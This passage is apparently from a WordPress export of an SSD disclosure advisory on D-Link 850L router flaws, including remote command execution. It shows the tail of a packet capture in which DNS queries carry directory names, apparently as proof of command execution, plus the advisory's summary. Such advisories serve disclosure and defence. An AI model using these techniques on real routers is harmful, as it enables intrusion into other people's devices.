<\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-24\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.972015<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.41323<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">var<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-25\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.972036<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-26\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.974624<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.50795<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-27\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.974653<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-28\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.975316<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.38359<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-29\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.975337<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-30\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.975827<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.55240<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-31\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.975848<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-32\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.976660<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.44499<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-33\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.976668<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-34\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.979721<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.57446<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-35\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.979748<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-36\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.980401<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.35172<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">A<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac96b002262104-37\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.980422<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ICMP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">udp <\/span><span class=\"crayon-i\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">unreachable<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">length<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac96b002262104-38\"><span class=\"crayon-cn\">17<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">41<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">44.983041<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">IP<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.100.60090<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.1.53<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AAAA<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0138 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3364\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 08 Aug 2017 08:49:00 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describe three (3) vulnerabilities found in D-Link 850L router. The vulnerabilities have been reported as part of Hack2Win competition, for more information about Hack2Win &#8211; Hack2Win &#8211; https:\/\/blogs.securiteam.com\/index.php\/archives\/3310. The vulnerabilities found in D-Link 850L are: Remote Command Execution via WAN and LAN Remote Unauthenticated Information Disclosure via WAN and LAN &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3364\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 D-Link 850L Multiple Vulnerabilities (Hack2Win Contest)<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11591,12603,11851,10757,12136,12686],"class_list":["post-8641","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-file-disclosure","tag-hack2win","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action","tag-unrestricted-file-upload"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8641","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=8641"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/8641\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=8641"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=8641"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=8641"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}